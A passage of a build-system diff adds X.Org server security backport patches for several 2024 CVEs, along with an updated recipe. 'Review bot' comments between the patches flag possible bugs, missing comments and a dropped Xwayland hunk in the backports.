+ while (nval > 0) {
+- FixDeviceStateNotify(dev, ev++, NULL, NULL, v, first);
+- first += 3;
+- nval -= 3;
+- if (nval > 0) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
+- first += 3;
+- nval -= 3;
+- }
++ ev->deviceid |= MORE_EVENTS;
++ FixDeviceValuator(dev, (deviceValuator *) ++ev, v, first);
++ first += 6;
++ nval -= 6;
+ }
+
+ DeliverEventsToWindow(dev, win, (xEvent *) sev, evcount,
+--
+GitLab
+
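Review bot: In the FixDeviceValuator hunk the new `case 6:`, `case 5:` and `case 4:` arms all assign `ev->valuator2`, so the values for axes first+3 to first+5 overwrite one another and the fields meant for them are never written. Since `sev[]` is an uninitialised stack array, those fields would reach the client with whatever the stack held. The arms should read `ev->valuator5 = v->axisVal[first + 5];`, `ev->valuator4 = v->axisVal[first + 4];` and `ev->valuator3 = v->axisVal[first + 3];`. Separately, `evcount += ((nval - 3) + 6)/6;` counts one event too many whenever `nval - 3` is a multiple of six (with `nval == 3` it adds an event although the loop writes none), so the rounding term should be 5 rather than 6. FixDeviceValuator starts outside the hunk.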
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch
new file mode 100644
index 0000000000..742c122fa8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch
@@ -0,0 +1,41 @@
+From df3c65706eb169d5938df0052059f3e0d5981b74 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 21 Dec 2023 13:48:10 +1000
+Subject: [PATCH] Xi: when creating a new ButtonClass, set the number of
+ buttons
+
+There's a racy sequence where a master device may copy the button class
+from the slave, without ever initializing numButtons. This leads to a
+device with zero buttons but a button class which is invalid.
+
+Let's copy the numButtons value from the source - by definition if we
+don't have a button class yet we do not have any other slave devices
+with more than this number of buttons anyway.
+
+CVE-2024-0229, ZDI-CAN-22678
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/df3c65706eb169d5938df0052059f3e0d5981b74]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/exevents.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/Xi/exevents.c b/Xi/exevents.c
+index 54ea11a938..e161714682 100644
+--- a/Xi/exevents.c
++++ b/Xi/exevents.c
+@@ -605,6 +605,7 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
+ to->button = calloc(1, sizeof(ButtonClassRec));
+ if (!to->button)
+ FatalError("[Xi] no memory for class shift.\n");
++ to->button->numButtons = from->button->numButtons;
+ }
+ else
+ classes->button = NULL;
+--
+GitLab
+
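Review bot: The added `to->button->numButtons = from->button->numButtons;` in DeepCopyPointerClasses has no comment, so the reason it is safe is recorded only in the commit message. A short comment above it would keep that reasoning with the code, e.g. `/* new class: take numButtons from the source so a master never ends up with a button class but zero buttons */`. The enclosing if/else starts outside the hunk, so whether the non-allocating path also keeps numButtons in sync cannot be checked from here.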
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch
new file mode 100644
index 0000000000..d1a6214793
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch
@@ -0,0 +1,45 @@
+From 37539cb0bfe4ed96d4499bf371e6b1a474a740fe Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 21 Dec 2023 14:10:11 +1000
+Subject: [PATCH] Xi: require a pointer and keyboard device for
+ XIAttachToMaster
+
+If we remove a master device and specify which other master devices
+attached slaves should be returned to, enforce that those two are
+indeeed a pointer and a keyboard.
+
+Otherwise we can try to attach the keyboards to pointers and vice versa,
+leading to possible crashes later.
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/37539cb0bfe4ed96d4499bf371e6b1a474a740fe]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xichangehierarchy.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
+index 504defe566..d2d985848d 100644
+--- a/Xi/xichangehierarchy.c
++++ b/Xi/xichangehierarchy.c
+@@ -270,7 +270,7 @@ remove_master(ClientPtr client, xXIRemoveMasterInfo * r, int flags[MAXDEVICES])
+ if (rc != Success)
+ goto unwind;
+
+- if (!IsMaster(newptr)) {
++ if (!IsMaster(newptr) || !IsPointerDevice(newptr)) {
+ client->errorValue = r->return_pointer;
+ rc = BadDevice;
+ goto unwind;
+@@ -281,7 +281,7 @@ remove_master(ClientPtr client, xXIRemoveMasterInfo * r, int flags[MAXDEVICES])
+ if (rc != Success)
+ goto unwind;
+
+- if (!IsMaster(newkeybd)) {
++ if (!IsMaster(newkeybd) || !IsKeyboardDevice(newkeybd)) {
+ client->errorValue = r->return_keyboard;
+ rc = BadDevice;
+ goto unwind;
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch
new file mode 100644
index 0000000000..c8f75d8a7e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch
@@ -0,0 +1,64 @@
+From e5e8586a12a3ec915673edffa10dc8fe5e15dac3 Mon Sep 17 00:00:00 2001
+From: Olivier Fourdan <ofourdan@redhat.com>
+Date: Wed, 6 Dec 2023 12:09:41 +0100
+Subject: [PATCH] glx: Call XACE hooks on the GLX buffer
+
+The XSELINUX code will label resources at creation by checking the
+access mode. When the access mode is DixCreateAccess, it will call the
+function to label the new resource SELinuxLabelResource().
+
+However, GLX buffers do not go through the XACE hooks when created,
+hence leaving the resource actually unlabeled.
+
+When, later, the client tries to create another resource using that
+drawable (like a GC for example), the XSELINUX code would try to use
+the security ID of that object which has never been labeled, get a NULL
+pointer and crash when checking whether the requested permissions are
+granted for subject security ID.
+
+To avoid the issue, make sure to call the XACE hooks when creating the
+GLX buffers.
+
+Credit goes to Donn Seeley <donn@xmission.com> for providing the patch.
+
+CVE-2024-0408
+
+Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
+Acked-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/e5e8586a12a3ec915673edffa10dc8fe5e15dac3]
+CVE: CVE-2024-0408
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ glx/glxcmds.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/glx/glxcmds.c b/glx/glxcmds.c
+index fc26a2e345..1e46d0c723 100644
+--- a/glx/glxcmds.c
++++ b/glx/glxcmds.c
+@@ -48,6 +48,7 @@
+ #include "indirect_util.h"
+ #include "protocol-versions.h"
+ #include "glxvndabi.h"
++#include "xace.h"
+
+ static char GLXServerVendorName[] = "SGI";
+
+@@ -1392,6 +1393,13 @@ DoCreatePbuffer(ClientPtr client, int screenNum, XID fbconfigId,
+ if (!pPixmap)
+ return BadAlloc;
+
++ err = XaceHook(XACE_RESOURCE_ACCESS, client, glxDrawableId, RT_PIXMAP,
++ pPixmap, RT_NONE, NULL, DixCreateAccess);
++ if (err != Success) {
++ (*pGlxScreen->pScreen->DestroyPixmap) (pPixmap);
++ return err;
++ }
++
+ /* Assign the pixmap the same id as the pbuffer and add it as a
+ * resource so it and the DRI2 drawable will be reclaimed when the
+ * pbuffer is destroyed. */
+--
+GitLab
+
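Review bot: The new `XaceHook(XACE_RESOURCE_ACCESS, ..., DixCreateAccess)` call in DoCreatePbuffer has no comment explaining why a create-access hook runs on a pixmap the server itself just allocated. Per the commit message, this hook is what lets XSELINUX label the resource, so I would add something like `/* run the XACE create hook so security modules label the pixmap before it is added as a resource */` above it. The failure path destroys the pixmap before returning, which looks right. `err` is not declared in this hunk, so it is presumably an existing local of the function, which starts outside the hunk.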
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch
new file mode 100644
index 0000000000..9763e0b562
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch
@@ -0,0 +1,46 @@
+From 2ef0f1116c65d5cb06d7b6d83f8a1aea702c94f7 Mon Sep 17 00:00:00 2001
+From: Olivier Fourdan <ofourdan@redhat.com>
+Date: Wed, 6 Dec 2023 11:51:56 +0100
+Subject: [PATCH] ephyr,xwayland: Use the proper private key for cursor
+
+The cursor in DIX is actually split in two parts, the cursor itself and
+the cursor bits, each with their own devPrivates.
+
+The cursor itself includes the cursor bits, meaning that the cursor bits
+devPrivates in within structure of the cursor.
+
+Both Xephyr and Xwayland were using the private key for the cursor bits
+to store the data for the cursor, and when using XSELINUX which comes
+with its own special devPrivates, the data stored in that cursor bits'
+devPrivates would interfere with the XSELINUX devPrivates data and the
+SELINUX security ID would point to some other unrelated data, causing a
+crash in the XSELINUX code when trying to (re)use the security ID.
+
+CVE-2024-0409
+
+Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
+Reviewed-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/2ef0f1116c65d5cb06d7b6d83f8a1aea702c94f7]
+CVE: CVE-2024-0409
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/kdrive/ephyr/ephyrcursor.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/kdrive/ephyr/ephyrcursor.c b/hw/kdrive/ephyr/ephyrcursor.c
+index f991899..3f192d0 100644
+--- a/hw/kdrive/ephyr/ephyrcursor.c
++++ b/hw/kdrive/ephyr/ephyrcursor.c
+@@ -246,7 +246,7 @@ miPointerSpriteFuncRec EphyrPointerSpriteFuncs = {
+ Bool
+ ephyrCursorInit(ScreenPtr screen)
+ {
+- if (!dixRegisterPrivateKey(&ephyrCursorPrivateKey, PRIVATE_CURSOR_BITS,
++ if (!dixRegisterPrivateKey(&ephyrCursorPrivateKey, PRIVATE_CURSOR,
+ sizeof(ephyrCursorRec)))
+ return FALSE;
+
+--
+2.25.1
+
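Review bot: The subject says "ephyr,xwayland", but the diffstat and the only hunk of this backport touch `hw/kdrive/ephyr/ephyrcursor.c`, so the xwayland half of the change is not carried here. If the source tree this recipe builds still contains an Xwayland cursor implementation that registers its private key with `PRIVATE_CURSOR_BITS`, and Xwayland can be enabled for the build, that path would keep the devPrivates clash the commit message describes. Please confirm which is the case and record it in the patch header, e.g. a line such as `Xwayland hunk dropped: <reason>` next to `Upstream-Status`.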
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch
new file mode 100644
index 0000000000..7c8fbcc3ec
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch
@@ -0,0 +1,113 @@
+From 4a5e9b1895627d40d26045bd0b7ef3dce503cbd1 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 4 Jan 2024 10:01:24 +1000
+Subject: [PATCH] Xi: flush hierarchy events after adding/removing master
+ devices
+
+The `XISendDeviceHierarchyEvent()` function allocates space to store up
+to `MAXDEVICES` (256) `xXIHierarchyInfo` structures in `info`.
+
+If a device with a given ID was removed and a new device with the same
+ID added both in the same operation, the single device ID will lead to
+two info structures being written to `info`.
+
+Since this case can occur for every device ID at once, a total of two
+times `MAXDEVICES` info structures might be written to the allocation.
+
+To avoid it, once one add/remove master is processed, send out the
+device hierarchy event for the current state and continue. That event
+thus only ever has exactly one of either added/removed in it (and
+optionally slave attached/detached).
+
+CVE-2024-21885, ZDI-CAN-22744
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/4a5e9b1895627d40d26045bd0b7ef3dce503cbd1]
+CVE: CVE-2024-21885
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xichangehierarchy.c | 27 ++++++++++++++++++++++-----
+ 1 file changed, 22 insertions(+), 5 deletions(-)
+
+diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
+index d2d985848d..72d00451e3 100644
+--- a/Xi/xichangehierarchy.c
++++ b/Xi/xichangehierarchy.c
+@@ -416,6 +416,11 @@ ProcXIChangeHierarchy(ClientPtr client)
+ size_t len; /* length of data remaining in request */
+ int rc = Success;
+ int flags[MAXDEVICES] = { 0 };
++ enum {
++ NO_CHANGE,
++ FLUSH,
++ CHANGED,
++ } changes = NO_CHANGE;
+
+ REQUEST(xXIChangeHierarchyReq);
+ REQUEST_AT_LEAST_SIZE(xXIChangeHierarchyReq);
+@@ -465,8 +470,9 @@ ProcXIChangeHierarchy(ClientPtr client)
+ rc = add_master(client, c, flags);
+ if (rc != Success)
+ goto unwind;
+- }
++ changes = FLUSH;
+ break;
++ }
+ case XIRemoveMaster:
+ {
+ xXIRemoveMasterInfo *r = (xXIRemoveMasterInfo *) any;
+@@ -475,8 +481,9 @@ ProcXIChangeHierarchy(ClientPtr client)
+ rc = remove_master(client, r, flags);
+ if (rc != Success)
+ goto unwind;
+- }
++ changes = FLUSH;
+ break;
++ }
+ case XIDetachSlave:
+ {
+ xXIDetachSlaveInfo *c = (xXIDetachSlaveInfo *) any;
+@@ -485,8 +492,9 @@ ProcXIChangeHierarchy(ClientPtr client)
+ rc = detach_slave(client, c, flags);
+ if (rc != Success)
+ goto unwind;
+- }
++ changes = CHANGED;
+ break;
++ }
+ case XIAttachSlave:
+ {
+ xXIAttachSlaveInfo *c = (xXIAttachSlaveInfo *) any;
+@@ -495,16 +503,25 @@ ProcXIChangeHierarchy(ClientPtr client)
+ rc = attach_slave(client, c, flags);
+ if (rc != Success)
+ goto unwind;
++ changes = CHANGED;
++ break;
+ }
++ default:
+ break;
+ }
+
++ if (changes == FLUSH) {
++ XISendDeviceHierarchyEvent(flags);
++ memset(flags, 0, sizeof(flags));
++ changes = NO_CHANGE;
++ }
++
+ len -= any->length * 4;
+ any = (xXIAnyHierarchyChangeInfo *) ((char *) any + any->length * 4);
+ }
+
+ unwind:
+-
+- XISendDeviceHierarchyEvent(flags);
++ if (changes != NO_CHANGE)
++ XISendDeviceHierarchyEvent(flags);
+ return rc;
+ }
+--
+GitLab
+
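Review bot: The three states of the new `changes` enum in ProcXIChangeHierarchy are undocumented, and their meaning has to be reconstructed from the switch and the `unwind:` label. A comment on the declaration would help, e.g. `/* FLUSH: a master was added/removed, send the hierarchy event now; CHANGED: slave attach/detach recorded in flags, event still pending */`. One thing to confirm: on a `goto unwind` taken right after a flush, `changes` is NO_CHANGE, so any flags a failing add_master/remove_master call set before returning its error are no longer reported. Those functions are outside the hunk, so I cannot tell whether they set flags before failing.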
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch
new file mode 100644
index 0000000000..1e1c782963
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch
@@ -0,0 +1,74 @@
+From bc1fdbe46559dd947674375946bbef54dd0ce36b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Jos=C3=A9=20Exp=C3=B3sito?= <jexposit@redhat.com>
+Date: Fri, 22 Dec 2023 18:28:31 +0100
+Subject: [PATCH] Xi: do not keep linked list pointer during recursion
+
+The `DisableDevice()` function is called whenever an enabled device
+is disabled and it moves the device from the `inputInfo.devices` linked
+list to the `inputInfo.off_devices` linked list.
+
+However, its link/unlink operation has an issue during the recursive
+call to `DisableDevice()` due to the `prev` pointer pointing to a
+removed device.
+
+This issue leads to a length mismatch between the total number of
+devices and the number of device in the list, leading to a heap
+overflow and, possibly, to local privilege escalation.
+
+Simplify the code that checked whether the device passed to
+`DisableDevice()` was in `inputInfo.devices` or not and find the
+previous device after the recursion.
+
+CVE-2024-21886, ZDI-CAN-22840
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/bc1fdbe46559dd947674375946bbef54dd0ce36b]
+CVE: CVE-2024-21886
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/devices.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/dix/devices.c b/dix/devices.c
+index dca98c8d1b..389d28a23c 100644
+--- a/dix/devices.c
++++ b/dix/devices.c
+@@ -453,14 +453,20 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
+ {
+ DeviceIntPtr *prev, other;
+ BOOL enabled;
++ BOOL dev_in_devices_list = FALSE;
+ int flags[MAXDEVICES] = { 0 };
+
+ if (!dev->enabled)
+ return TRUE;
+
+- for (prev = &inputInfo.devices;
+- *prev && (*prev != dev); prev = &(*prev)->next);
+- if (*prev != dev)
++ for (other = inputInfo.devices; other; other = other->next) {
++ if (other == dev) {
++ dev_in_devices_list = TRUE;
++ break;
++ }
++ }
++
++ if (!dev_in_devices_list)
+ return FALSE;
+
+ TouchEndPhysicallyActiveTouches(dev);
+@@ -511,6 +517,9 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
+ LeaveWindow(dev);
+ SetFocusOut(dev);
+
++ for (prev = &inputInfo.devices;
++ *prev && (*prev != dev); prev = &(*prev)->next);
++
+ *prev = dev->next;
+ dev->next = inputInfo.off_devices;
+ inputInfo.off_devices = dev;
+--
+GitLab
+
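Review bot: The second walk of `inputInfo.devices` added near the end of DisableDevice is followed directly by `*prev = dev->next;`, with no check that the walk actually stopped at `dev`. If the loop runs to the end of the list, `*prev` is the terminating NULL link and the assignment would splice `dev->next` onto the tail instead of unlinking anything. The membership test added at the top of the function runs before the code between the two hunks, which is not visible here, so it is unclear from the patch whether `dev` can have left the list by this point. A guard such as `if (*prev != dev) return FALSE;` before the unlink, or an assertion, would make the invariant explicit.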
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch
new file mode 100644
index 0000000000..af607df4f0
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch
@@ -0,0 +1,57 @@
+From 26769aa71fcbe0a8403b7fb13b7c9010cc07c3a8 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Fri, 5 Jan 2024 09:40:27 +1000
+Subject: [PATCH] dix: when disabling a master, float disabled slaved devices
+ too
+
+Disabling a master device floats all slave devices but we didn't do this
+to already-disabled slave devices. As a result those devices kept their
+reference to the master device resulting in access to already freed
+memory if the master device was removed before the corresponding slave
+device.
+
+And to match this behavior, also forcibly reset that pointer during
+CloseDownDevices().
+
+Related to CVE-2024-21886, ZDI-CAN-22840
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/26769aa71fcbe0a8403b7fb13b7c9010cc07c3a8]
+CVE: CVE-2024-21886
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/devices.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+diff --git a/dix/devices.c b/dix/devices.c
+index 389d28a23c..84a6406d13 100644
+--- a/dix/devices.c
++++ b/dix/devices.c
+@@ -483,6 +483,13 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
+ flags[other->id] |= XISlaveDetached;
+ }
+ }
++
++ for (other = inputInfo.off_devices; other; other = other->next) {
++ if (!IsMaster(other) && GetMaster(other, MASTER_ATTACHED) == dev) {
++ AttachDevice(NULL, other, NULL);
++ flags[other->id] |= XISlaveDetached;
++ }
++ }
+ }
+ else {
+ for (other = inputInfo.devices; other; other = other->next) {
+@@ -1088,6 +1095,11 @@ CloseDownDevices(void)
+ dev->master = NULL;
+ }
+
++ for (dev = inputInfo.off_devices; dev; dev = dev->next) {
++ if (!IsMaster(dev) && !IsFloating(dev))
++ dev->master = NULL;
++ }
++
+ CloseDeviceList(&inputInfo.devices);
+ CloseDeviceList(&inputInfo.off_devices);
+
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch
new file mode 100644
index 0000000000..da735efb2b
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch
@@ -0,0 +1,49 @@
+From 96798fc1967491c80a4d0c8d9e0a80586cb2152b Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Fri, 22 Mar 2024 18:51:45 -0700
+Subject: [PATCH] Xi: ProcXIGetSelectedEvents needs to use unswapped length to
+ send reply
+
+CVE-2024-31080
+
+Reported-by: https://debbugs.gnu.org/cgi/bugreport.cgi?bug=69762
+Fixes: 53e821ab4 ("Xi: add request processing for XIGetSelectedEvents.")
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+Part-of: <https://gitlab.freedesktop.org/xorg/xserver/-/merge_requests/1463>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/96798fc1967491c80a4d0c8d9e0a80586cb2152b]
+CVE: CVE-2024-31080
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ Xi/xiselectev.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/Xi/xiselectev.c b/Xi/xiselectev.c
+index edcb8a0d36..ac14949871 100644
+--- a/Xi/xiselectev.c
++++ b/Xi/xiselectev.c
+@@ -349,6 +349,7 @@ ProcXIGetSelectedEvents(ClientPtr client)
+ InputClientsPtr others = NULL;
+ xXIEventMask *evmask = NULL;
+ DeviceIntPtr dev;
++ uint32_t length;
+
+ REQUEST(xXIGetSelectedEventsReq);
+ REQUEST_SIZE_MATCH(xXIGetSelectedEventsReq);
+@@ -418,10 +419,12 @@ ProcXIGetSelectedEvents(ClientPtr client)
+ }
+ }
+
++ /* save the value before SRepXIGetSelectedEvents swaps it */
++ length = reply.length;
+ WriteReplyToClient(client, sizeof(xXIGetSelectedEventsReply), &reply);
+
+ if (reply.num_masks)
+- WriteToClient(client, reply.length * 4, buffer);
++ WriteToClient(client, length * 4, buffer);
+
+ free(buffer);
+ return Success;
+--
+GitLab
+
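Review bot: After `WriteReplyToClient()` the code still tests `reply.num_masks`, a field of the same reply struct whose `length` is byte-swapped by SRepXIGetSelectedEvents according to the new comment. If that routine swaps `num_masks` as well, the test only works because a swapped non-zero value stays non-zero. Copying `num_masks` into a local before the call, as is now done for `length`, would avoid reading the struct after it has been handed to the swap path. The same applies to `rep.num_modifiers` in CVE-2024-31081.patch (ProcXIPassiveGrabDevice).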
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch
new file mode 100644
index 0000000000..d2c551a0e5
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch
@@ -0,0 +1,47 @@
+From 3e77295f888c67fc7645db5d0c00926a29ffecee Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Fri, 22 Mar 2024 18:56:27 -0700
+Subject: [PATCH] Xi: ProcXIPassiveGrabDevice needs to use unswapped length to
+ send reply
+
+CVE-2024-31081
+
+Fixes: d220d6907 ("Xi: add GrabButton and GrabKeysym code.")
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+Part-of: <https://gitlab.freedesktop.org/xorg/xserver/-/merge_requests/1463>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/3e77295f888c67fc7645db5d0c00926a29ffecee]
+CVE: CVE-2024-31081
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ Xi/xipassivegrab.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/Xi/xipassivegrab.c b/Xi/xipassivegrab.c
+index c9ac2f8553..896233bec2 100644
+--- a/Xi/xipassivegrab.c
++++ b/Xi/xipassivegrab.c
+@@ -93,6 +93,7 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+ GrabParameters param;
+ void *tmp;
+ int mask_len;
++ uint32_t length;
+
+ REQUEST(xXIPassiveGrabDeviceReq);
+ REQUEST_FIXED_SIZE(xXIPassiveGrabDeviceReq,
+@@ -247,9 +248,11 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+ }
+ }
+
++ /* save the value before SRepXIPassiveGrabDevice swaps it */
++ length = rep.length;
+ WriteReplyToClient(client, sizeof(rep), &rep);
+ if (rep.num_modifiers)
+- WriteToClient(client, rep.length * 4, modifiers_failed);
++ WriteToClient(client, length * 4, modifiers_failed);
+
+ out:
+ free(modifiers_failed);
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb
new file mode 100644
index 0000000000..04a6e734ef
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb
@@ -0,0 +1,61 @@
+require xserver-xorg.inc
+
+SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.patch \
+ file://pkgconfig.patch \
+ file://0001-test-xtest-Initialize-array-with-braces.patch \
+ file://sdksyms-no-build-path.patch \
+ file://0001-drmmode_display.c-add-missing-mi.h-include.patch \
+ file://CVE-2022-3550.patch \
+ file://CVE-2022-3551.patch \
+ file://CVE-2022-3553.patch \
+ file://CVE-2022-4283.patch \
+ file://CVE-2022-46340.patch \
+ file://CVE-2022-46341.patch \
+ file://CVE-2022-46342.patch \
+ file://CVE-2022-46343.patch \
+ file://CVE-2022-46344.patch \
+ file://CVE-2023-0494.patch \
+ file://CVE-2023-1393.patch \
+ file://CVE-2023-5367.patch \
+ file://CVE-2023-5380.patch \
+ file://CVE-2023-6377.patch \
+ file://CVE-2023-6478.patch \
+ file://CVE-2023-6816.patch \
+ file://CVE-2024-0229-1.patch \
+ file://CVE-2024-0229-2.patch \
+ file://CVE-2024-0229-3.patch \
+ file://CVE-2024-0229-4.patch \
+ file://CVE-2024-21885.patch \
+ file://CVE-2024-21886-1.patch \
+ file://CVE-2024-21886-2.patch \
+ file://CVE-2024-0408.patch \
+ file://CVE-2024-0409.patch \
+ file://CVE-2024-31081.patch \
+ file://CVE-2024-31080.patch \
+"
+SRC_URI[md5sum] = "453fc86aac8c629b3a5b77e8dcca30bf"
+SRC_URI[sha256sum] = "54b199c9280ff8bf0f73a54a759645bd0eeeda7255d1c99310d5b7595f3ac066"
+
+CFLAGS += "-fcommon"
+
+# These extensions are now integrated into the server, so declare the migration
+# path for in-place upgrades.
+
+RREPLACES_${PN} = "${PN}-extension-dri \
+ ${PN}-extension-dri2 \
+ ${PN}-extension-record \
+ ${PN}-extension-extmod \
+ ${PN}-extension-dbe \
+ "
+RPROVIDES_${PN} = "${PN}-extension-dri \
+ ${PN}-extension-dri2 \
+ ${PN}-extension-record \
+ ${PN}-extension-extmod \
+ ${PN}-extension-dbe \
+ "
+RCONFLICTS_${PN} = "${PN}-extension-dri \
+ ${PN}-extension-dri2 \
+ ${PN}-extension-record \
+ ${PN}-extension-extmod \
+ ${PN}-extension-dbe \
+ "
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb
deleted file mode 100644
index 51d959f86c..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb
+++ /dev/null
@@ -1,38 +0,0 @@
-require xserver-xorg.inc
-
-SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.patch \
- file://pkgconfig.patch \
- file://0001-test-xtest-Initialize-array-with-braces.patch \
- file://sdksyms-no-build-path.patch \
- file://0001-drmmode_display.c-add-missing-mi.h-include.patch \
- file://CVE-2020-14347.patch \
- file://CVE-2020-14346.patch \
- file://CVE-2020-14361.patch \
- file://CVE-2020-14362.patch \
- "
-SRC_URI[md5sum] = "a770aec600116444a953ff632f51f839"
-SRC_URI[sha256sum] = "d17b646bee4ba0fb7850c1cc55b18e3e8513ed5c02bdf38da7e107f84e2d0146"
-
-CFLAGS += "-fcommon"
-
-# These extensions are now integrated into the server, so declare the migration
-# path for in-place upgrades.
-
-RREPLACES_${PN} = "${PN}-extension-dri \
- ${PN}-extension-dri2 \
- ${PN}-extension-record \
- ${PN}-extension-extmod \
- ${PN}-extension-dbe \
- "
-RPROVIDES_${PN} = "${PN}-extension-dri \
- ${PN}-extension-dri2 \
- ${PN}-extension-record \
